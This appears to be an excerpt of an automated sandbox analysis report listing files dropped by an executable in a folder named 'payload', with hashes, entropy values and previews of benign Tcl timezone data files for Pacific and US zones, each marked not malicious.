                                                                                                                                                                                                                                            SHA-512:42AD074EE08E083EE91270F203707698A8B3308005C94514B8B2D950F4C6F0B37D7D32973EC9F6AB49A0875209076FB40341B31433A27E47B3CC0EA711ECE321
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:NZ) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.881663364410736
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG9WQ+DyXHAIgObT9WQiovRL/5AmtBFB/pUDH9WQg:SlSWB9vsM3ycwQ+DSHAIgObwQTN/zzJ7
                                                                                                                                                                                                                                            MD5:3811C133C6311E33FDAF93660E1EAED5
                                                                                                                                                                                                                                            SHA1:64756FF877B2EB91BAED2889B3924DAB6784DF43
                                                                                                                                                                                                                                            SHA-256:83F4CA3522B64F9B151EDEFAE53E0F28C2E6C4CE16D0982186B3344F2A268724
                                                                                                                                                                                                                                            SHA-512:7724D6CD08E13E116CCDF073F86CE317C0D4A849C5FE81DF3127D435704507FBF554BFC6E7A50CCA3852F6001D8654B7FF90466878DB8C3298338BE16149FD32
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Chatham)]} {.. LoadTimeZoneFile Pacific/Chatham..}..set TZData(:NZ-CHAT) $TZData(:Pacific/Chatham)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):177
                                                                                                                                                                                                                                            Entropy (8bit):4.8545620422964015
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/5vf1+IAcGE6RB:SlSWB9vsM3y7+SPHAIgp+ON/pd+90+B
                                                                                                                                                                                                                                            MD5:5E9F3294F68873BF503F3DDDDF6713B0
                                                                                                                                                                                                                                            SHA1:954CD6F123C043E64F5E49733327E2C78877BDFB
                                                                                                                                                                                                                                            SHA-256:2CC8CE235F2EE3160E6AFD04A4E28AA0312494EBB6FED08D8CC81D414EC540EE
                                                                                                                                                                                                                                            SHA-512:200FC489989CA57219D5B28FB135BE5BDAC67239F3D243C496545D86D68089E51856CEAC4D2E700C0E47BAE4D5FEAB18A367C554235615B2B860F4E5E1BB08C3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:Navajo) $TZData(:America/Denver)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):171
                                                                                                                                                                                                                                            Entropy (8bit):4.902914099699953
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/nL75h4WFKdy:SlSWB9vsM3yMPHAIgO8AN/H5h4wKU
                                                                                                                                                                                                                                            MD5:87C439DC623BF5C7EB01ADA6E67FB63A
                                                                                                                                                                                                                                            SHA1:1CC357558E09CDEA49F821826D2AEA9A6EF2C824
                                                                                                                                                                                                                                            SHA-256:6A5BAA9CA54B2A2C6D21287443BE0B1064AA79B5C4C62939933F8A0AD842B73E
                                                                                                                                                                                                                                            SHA-512:E628B8F1C967AABAEFBB68A33416F6FE47422970BA18414BB3396AC063E65A4DC892595D4071395194AF320633EE915A494E1F8D4216EE8194A034739D275C49
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:PRC) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8505
                                                                                                                                                                                                                                            Entropy (8bit):3.836877329152454
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:0KhTG0hjvZkR/bvtw+N6IkWq/WHQlb/RYRWVIKr7cRRL:0sG0U9bFzN6IkWq/WHQt/RY4yP
                                                                                                                                                                                                                                            MD5:45E7E9E183A990F56E17C04FA48CE620
                                                                                                                                                                                                                                            SHA1:A1F39E0ECEA3C64E761A9A3159E331FA51B625F9
                                                                                                                                                                                                                                            SHA-256:D148708F1E70EEFA51E88E5823776CBE710535D4D6D6356E7753A44463A1C5AB
                                                                                                                                                                                                                                            SHA-512:1D1F4BA90D07D7EE12DFD0E37DBFD5410A4EAFFBA8960B816FDD5963CD6B20938080A4248E7B249AAE02F068E817AB9A85735D226F7DA8DD2C5462A70B18E8EF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:PST8PDT) {.. {-9223372036854775808 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-84376800 -25200 1 PDT}.. {-68655600 -28800 0 PST}.. {-52927200 -25200 1 PDT}.. {-37206000 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):909
                                                                                                                                                                                                                                            Entropy (8bit):4.042826306713664
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86HbmdH2oVCvcCfdf3NaDyTb6Dye78ubUt1NEUtszIVbUtoUtoUt3mbUt4qUt6:Yekv5fcfem+Cuy
                                                                                                                                                                                                                                            MD5:E5B913965F72AB807BAE67BD20C0A699
                                                                                                                                                                                                                                            SHA1:2161B73EC868C8D18C09970766D19A8583FF7981
                                                                                                                                                                                                                                            SHA-256:983884249ACC11C3FE740D78E72B1A89BE9C8B077283549BF6BCD8C93FA71731
                                                                                                                                                                                                                                            SHA-512:F8807C52DB852C48C62F25569C990C31D977BC7D0DF502CF2B92F9ED6BCB89A6DD8A6758FBD1185E0B5C34DE5450D5C748B71760AC93E72DC3976B3B31D1A605
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Apia) {.. {-9223372036854775808 45184 0 LMT}.. {-2445424384 -41216 0 LMT}.. {-1861878784 -41400 0 -1130}.. {-631110600 -39600 0 -11}.. {1285498800 -36000 1 -11}.. {1301752800 -39600 0 -11}.. {1316872800 -36000 1 -11}.. {1325239200 50400 0 +13}.. {1333202400 46800 0 +13}.. {1348927200 50400 1 +13}.. {1365256800 46800 0 +13}.. {1380376800 50400 1 +13}.. {1396706400 46800 0 +13}.. {1411826400 50400 1 +13}.. {1428156000 46800 0 +13}.. {1443276000 50400 1 +13}.. {1459605600 46800 0 +13}.. {1474725600 50400 1 +13}.. {1491055200 46800 0 +13}.. {1506175200 50400 1 +13}.. {1522504800 46800 0 +13}.. {1538229600 50400 1 +13}.. {1554559200 46800 0 +13}.. {1569679200 50400 1 +13}.. {1586008800 46800 0 +13}.. {1601128800 50400 1 +13}.. {1617458400 46800 0 +13}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8772
                                                                                                                                                                                                                                            Entropy (8bit):3.900078030355782
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:pj4hKuZaqaaiFKgjGeGV3atL67G9kJGsU+mpe7Vy:Cla1KgjGeGcQMsa
                                                                                                                                                                                                                                            MD5:8174D7205622711F58E0B515246FE89D
                                                                                                                                                                                                                                            SHA1:9777B2633ACF5588268D5072F817E65C879358AC
                                                                                                                                                                                                                                            SHA-256:201CFADB00FBCD3283249DAD73872ED75C5BEC07F5A5B157726638C20728B833
                                                                                                                                                                                                                                            SHA-512:64121ED1EE70D5423710319E806B19261576AECC89A64CBEC44A29BF4AC9FEE21C6484CC3C4550CC92C315B3855BE265F696F8CD4D95027226D608B3ADD022F1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Auckland) {.. {-9223372036854775808 41944 0 LMT}.. {-3192435544 41400 0 NZMT}.. {-1330335000 45000 1 NZST}.. {-1320057000 41400 0 NZMT}.. {-1300699800 43200 1 NZST}.. {-1287396000 41400 0 NZMT}.. {-1269250200 43200 1 NZST}.. {-1255946400 41400 0 NZMT}.. {-1237800600 43200 1 NZST}.. {-1224496800 41400 0 NZMT}.. {-1206351000 43200 1 NZST}.. {-1192442400 41400 0 NZMT}.. {-1174901400 43200 1 NZST}.. {-1160992800 41400 0 NZMT}.. {-1143451800 43200 1 NZST}.. {-1125914400 41400 0 NZMT}.. {-1112607000 43200 1 NZST}.. {-1094464800 41400 0 NZMT}.. {-1081157400 43200 1 NZST}.. {-1063015200 41400 0 NZMT}.. {-1049707800 43200 1 NZST}.. {-1031565600 41400 0 NZMT}.. {-1018258200 43200 1 NZST}.. {-1000116000 41400 0 NZMT}.. {-986808600 43200 1 NZST}.. {-968061600 41400 0 NZMT}.. {-955359000 43200 1 NZST}.. {-936612000 41400 0 NZMT}.. {-923304600 4320
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):280
                                                                                                                                                                                                                                            Entropy (8bit):4.715653436088026
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/FtTfDm2OHHhp5oHvZiuo2HvDVeEU8vScH9syZEizy:MB86FtTLmdHf5CvZiIvJeJ8HH9F6izy
                                                                                                                                                                                                                                            MD5:4E858B3754BD8864719A61839ACA64E6
                                                                                                                                                                                                                                            SHA1:597025A8DAFD5AE75EBD162AC0E9DA71815816BA
                                                                                                                                                                                                                                            SHA-256:2D3BFDED297214BA25CFD8C6F508D0C8B1A1CD7D46701A78EC5E510076185EB6
                                                                                                                                                                                                                                            SHA-512:720F301B73C852EA8EEFA79DEF6B6762554E50222DE114FE87EB5178507F1895A9A39B3872A1A4B9DFF58D1CC6460BA4A82F2C165E3659E13036451F22E389C3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Bougainville) {.. {-9223372036854775808 37336 0 LMT}.. {-2840178136 35312 0 PMMT}.. {-2366790512 36000 0 +10}.. {-868010400 32400 0 +09}.. {-768906000 36000 0 +10}.. {1419696000 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8165
                                                                                                                                                                                                                                            Entropy (8bit):3.6566720439018874
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:gpvlGCcn6AadFurBrioCdL49mq9X4a2t3I/KVE:gOCBdFurBr0soaz
                                                                                                                                                                                                                                            MD5:8105A806A1762932897AB59C47BBE89E
                                                                                                                                                                                                                                            SHA1:386E41A4A83FA84DBFCA994F679242D067CEED64
                                                                                                                                                                                                                                            SHA-256:CA0EEF84DBC5964EF2265E9252237BE58BB8D75C34817CC2305CCCFAEC7E690C
                                                                                                                                                                                                                                            SHA-512:8A609E7F4868BD455DA811E62142FECD792D0CA0DAAF7C10C4E4254C9EC44B8EB92D388D9224C8FD3CC3FB326A106D831B80F5E1264CCF3EABBCE177BB82E9D6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Chatham) {.. {-9223372036854775808 44028 0 LMT}.. {-3192437628 44100 0 +1215}.. {-757426500 45900 0 +1245}.. {152632800 49500 1 +1245}.. {162309600 45900 0 +1245}.. {183477600 49500 1 +1245}.. {194968800 45900 0 +1245}.. {215532000 49500 1 +1245}.. {226418400 45900 0 +1245}.. {246981600 49500 1 +1245}.. {257868000 45900 0 +1245}.. {278431200 49500 1 +1245}.. {289317600 45900 0 +1245}.. {309880800 49500 1 +1245}.. {320767200 45900 0 +1245}.. {341330400 49500 1 +1245}.. {352216800 45900 0 +1245}.. {372780000 49500 1 +1245}.. {384271200 45900 0 +1245}.. {404834400 49500 1 +1245}.. {415720800 45900 0 +1245}.. {436284000 49500 1 +1245}.. {447170400 45900 0 +1245}.. {467733600 49500 1 +1245}.. {478620000 45900 0 +1245}.. {499183200 49500 1 +1245}.. {510069600 45900 0 +1245}.. {530632800 49500 1 +1245}.. {541519200 45900 0 +1245}.. {56208
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202
                                                                                                                                                                                                                                            Entropy (8bit):4.943709180393636
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yci/452HAIgObi/4oA6N/ZE/4pv:MByMdNXiU5tVv
                                                                                                                                                                                                                                            MD5:7D9980F68F044EB9B7FA7ED2883645F2
                                                                                                                                                                                                                                            SHA1:9444DA9D3139F51C6DFDA174C8C52A231215D71E
                                                                                                                                                                                                                                            SHA-256:F324CA637180F50DB79FFA25204D974C6A7A6FAEFDA69FD1A280B9F366349A09
                                                                                                                                                                                                                                            SHA-512:850577ABD3A3653076797D46AF481343CDF8103AC597EB68F575C5FF4931242C6ACEB054D14E0F6A9A90E5D22069F78027215A4E44FC900292445FDEAFB8F92D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Port_Moresby)]} {.. LoadTimeZoneFile Pacific/Port_Moresby..}..set TZData(:Pacific/Chuuk) $TZData(:Pacific/Port_Moresby)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8203
                                                                                                                                                                                                                                            Entropy (8bit):3.5469404823178463
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:QXn3AWkHkPp2YXaVU+POtUn4n6MSmSmiTpk9eL6Z5waKkhWILTc:QXn3AWJB2m+POtUnOSmSmS6ZaILg
                                                                                                                                                                                                                                            MD5:002F3607DE2061A2E1A8EB8EBCB6E492
                                                                                                                                                                                                                                            SHA1:6521B47847CFA76FE45AE5CC649109E4AD6C5262
                                                                                                                                                                                                                                            SHA-256:D79A2A67606F25D6420F31129FAE966A54287DE96C661003CCE5F82B618014BC
                                                                                                                                                                                                                                            SHA-512:03F3F262538FAF5A1B38832EFA62E3CC41A70BF54E73DE59BC99DCCA035AB002142F42BEDA5BFC2102CD556601E0A278908FDCC838A2211AC63C49A8483CE72B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Easter) {.. {-9223372036854775808 -26248 0 LMT}.. {-2524495352 -26248 0 EMT}.. {-1178124152 -25200 0 -07}.. {-36619200 -21600 1 -07}.. {-23922000 -25200 0 -07}.. {-3355200 -21600 1 -07}.. {7527600 -25200 0 -07}.. {24465600 -21600 1 -07}.. {37767600 -25200 0 -07}.. {55915200 -21600 1 -07}.. {69217200 -25200 0 -07}.. {87969600 -21600 1 -07}.. {100666800 -25200 0 -07}.. {118209600 -21600 1 -07}.. {132116400 -25200 0 -07}.. {150868800 -21600 1 -07}.. {163566000 -25200 0 -07}.. {182318400 -21600 1 -07}.. {195620400 -25200 0 -07}.. {213768000 -21600 1 -07}.. {227070000 -25200 0 -07}.. {245217600 -21600 1 -07}.. {258519600 -25200 0 -07}.. {277272000 -21600 1 -07}.. {289969200 -25200 0 -07}.. {308721600 -21600 1 -07}.. {321418800 -25200 0 -07}.. {340171200 -21600 1 -07}.. {353473200 -25200 0 -07}.. {371620800 -21600 1 -07}.. {384922800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):789
                                                                                                                                                                                                                                            Entropy (8bit):4.0457106900970325
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86HmdH6mvCON3Xj/kw2eX/xtDedjX24ots0FX2ud5KRGkpFxy:uegazZBzCdXUFQzy
                                                                                                                                                                                                                                            MD5:6841B8A2FB9BBF464AA00088CBDCEC80
                                                                                                                                                                                                                                            SHA1:26CC5CCE00A765F8B6493ED24F50957AA7F0089B
                                                                                                                                                                                                                                            SHA-256:332372E5EFB46123FBB66F9F32F91B59EBD88ADB956249DB3F14CAAB01CE2655
                                                                                                                                                                                                                                            SHA-512:A6C67A0F7361E599369597E9A8A52FC7D5C96DE6B5A7C1BE1D02F5DF11051F448289786C7F0E82E71CDEB825215E64E072CF034C45D6E2F822D7201AB8B41B57
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Efate) {.. {-9223372036854775808 40396 0 LMT}.. {-1829387596 39600 0 +11}.. {125409600 43200 1 +11}.. {133876800 39600 0 +11}.. {433256400 43200 1 +11}.. {448977600 39600 0 +11}.. {464706000 43200 1 +11}.. {480427200 39600 0 +11}.. {496760400 43200 1 +11}.. {511876800 39600 0 +11}.. {528210000 43200 1 +11}.. {543931200 39600 0 +11}.. {559659600 43200 1 +11}.. {575380800 39600 0 +11}.. {591109200 43200 1 +11}.. {606830400 39600 0 +11}.. {622558800 43200 1 +11}.. {638280000 39600 0 +11}.. {654008400 43200 1 +11}.. {669729600 39600 0 +11}.. {686062800 43200 1 +11}.. {696340800 39600 0 +11}.. {719931600 43200 1 +11}.. {727790400 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.82787610497142
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG11avXHAIgObT11ORL/nUDH7/UDH11B:SlSWB9vsM3yckHAIgObON/h
                                                                                                                                                                                                                                            MD5:CD1AC50AADC3CF9C0E7A055D587E790D
                                                                                                                                                                                                                                            SHA1:BEE0E16D3954DF33C697DEA469A130BD9875AB8B
                                                                                                                                                                                                                                            SHA-256:790E6B48B261D6DEF7D183CC8F38FB8D8A6E3EFB8844281EFABB2DFD621E53B5
                                                                                                                                                                                                                                            SHA-512:B6A93DFB4CBE2F35268AACA88FDCC4D19949A2E8DC9464D8341C38065C6FF48A3C49FE756FFCE777C8F806DE309C8AFC4CE4BC4ABD183C28808F995A0F89B091
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Kanton)]} {.. LoadTimeZoneFile Pacific/Kanton..}..set TZData(:Pacific/Enderbury) $TZData(:Pacific/Kanton)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.913439535905759
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDH4ErKYofMXGm2OH18VkeoHvmUENBBy/aCPFVFv7Dy:SlSWB9eg/BE3ofDm2OH1VeoHvmH7y/Fy
                                                                                                                                                                                                                                            MD5:6250F332356787613A2D1853EF6D1AC3
                                                                                                                                                                                                                                            SHA1:0464B9EE8B691990022295D2DEFE1AAE4B247E63
                                                                                                                                                                                                                                            SHA-256:336058DCA4802C79ED43F6177ADB73085D4FA0754B94051CAE2A19346B0C4904
                                                                                                                                                                                                                                            SHA-512:B8FAB5E128D2EF3CB7050DA717D80247045BE09F7F6542AA154CB85F4A56884F195EE2776421890A3F86D133106DCA4672D7D9329E0DE6F4A7CF8F4030822988
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Fakaofo) {.. {-9223372036854775808 -41096 0 LMT}.. {-2177411704 -39600 0 -11}.. {1325242800 46800 0 +13}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):986
                                                                                                                                                                                                                                            Entropy (8bit):3.950865906618592
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CKeaEa+TkUqOL1X7dMUhSXUmxY8yiUKEMH0Mkxu:9pW15Mmk59NQMk0
                                                                                                                                                                                                                                            MD5:E329ACBF859B35950B27F434D725B3F8
                                                                                                                                                                                                                                            SHA1:9B46C4318CA0F03E016F8FF68FEE50EA93B22360
                                                                                                                                                                                                                                            SHA-256:0FF7AF55C92806751473CBF7A55E860850719BA7255CD65FD630B99E05C7C177
                                                                                                                                                                                                                                            SHA-512:84A7491E2C8A6866B40A3673C084ABF3F1E344CB0290C607A0BB06FF19D43EF0B9648CDA6489D10C410D39C700D8C62A8BA11EEF07AD36F5A9AD85C596205939
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Fiji) {.. {-9223372036854775808 42944 0 LMT}.. {-1709985344 43200 0 +12}.. {909842400 46800 1 +12}.. {920124000 43200 0 +12}.. {941896800 46800 1 +12}.. {951573600 43200 0 +12}.. {1259416800 46800 1 +12}.. {1269698400 43200 0 +12}.. {1287842400 46800 1 +12}.. {1299333600 43200 0 +12}.. {1319292000 46800 1 +12}.. {1327154400 43200 0 +12}.. {1350741600 46800 1 +12}.. {1358604000 43200 0 +12}.. {1382796000 46800 1 +12}.. {1390050000 43200 0 +12}.. {1414850400 46800 1 +12}.. {1421503200 43200 0 +12}.. {1446300000 46800 1 +12}.. {1452952800 43200 0 +12}.. {1478354400 46800 1 +12}.. {1484402400 43200 0 +12}.. {1509804000 46800 1 +12}.. {1515852000 43200 0 +12}.. {1541253600 46800 1 +12}.. {1547301600 43200 0 +12}.. {1573308000 46800 1 +12}.. {1578751200 43200 0 +12}.. {1608386400 46800 1 +12}.. {1610805600 43200 0 +12}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.770127787944403
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGqhyXHAIgObTq0vFvRL/nUDH4QwyFPUDHqNn:SlSWB9vsM3ycmhSHAIgObmSN/BCLNn
                                                                                                                                                                                                                                            MD5:BBB00369FA8DCC23A7824EDB964BF48D
                                                                                                                                                                                                                                            SHA1:A97E42B3CC45860CC0DFC62F468B24A628B43973
                                                                                                                                                                                                                                            SHA-256:AFFB0A5D9CBD5949F2FC5047820FA2A2798F7C303F7BC972EC49CCF27837B00E
                                                                                                                                                                                                                                            SHA-512:2D4C8616308522C987437C39C74E250973C2AC7AA1499C60321F42E84CE52C28D1F6AE81E6390B116C92C7B208EA0F211EB3C5A86E6E4CEE0620014DE5359F4F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Tarawa)]} {.. LoadTimeZoneFile Pacific/Tarawa..}..set TZData(:Pacific/Funafuti) $TZData(:Pacific/Tarawa)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):247
                                                                                                                                                                                                                                            Entropy (8bit):4.687336389955113
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/fEGDm2OHvQYeoHTie7KVQRncRvinrN5/uFifriX:MB86fhmdH0CTV7OcdrN5/uFiGX
                                                                                                                                                                                                                                            MD5:0557D164DCD8DF5D99F7AF5A2AB1AD4F
                                                                                                                                                                                                                                            SHA1:68AFD04303E5F541480425405D82E1827F78A8DF
                                                                                                                                                                                                                                            SHA-256:192545659F971084ADC8489A2B96A6439FF391599DC962AA13375ACCFB3C09D9
                                                                                                                                                                                                                                            SHA-512:1DA004E51F8E7A712EDE920CBB62E81F9F55450FB52B62F78F1CD4F8F4E342B4DAB2C28AA5161E8B24942A7A5BD55F978AFDA1C5E1949241E71D738079DEF9B8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Galapagos) {.. {-9223372036854775808 -21504 0 LMT}.. {-1230746496 -18000 0 -05}.. {504939600 -21600 0 -06}.. {722930400 -18000 1 -06}.. {728888400 -21600 0 -06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):155
                                                                                                                                                                                                                                            Entropy (8bit):4.976931060677737
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDH5hBYfMXGm2OHKToxYoHsdNfis:SlSWB9eg/DDm2OHPxYoH4qs
                                                                                                                                                                                                                                            MD5:45330CE0FA604304C6ACF8EF8CAF51EC
                                                                                                                                                                                                                                            SHA1:20EEF9646996C2EC9B2641EBCCBE4766BF38B17B
                                                                                                                                                                                                                                            SHA-256:190E02A0C00D165FA45C73AEF9C0D6C82B1720E7406E5610DD860AED10A021A5
                                                                                                                                                                                                                                            SHA-512:51C7931B503405DA0B4078F6BE411895DD00E86AC7C5BE475030664D5302AD614293541DEE7FFC3D86A9DDB1BDA32BCAA746CF1D207DB063FBA2F9E9BE12836C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Gambier) {.. {-9223372036854775808 -32388 0 LMT}.. {-1806678012 -32400 0 -09}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):157
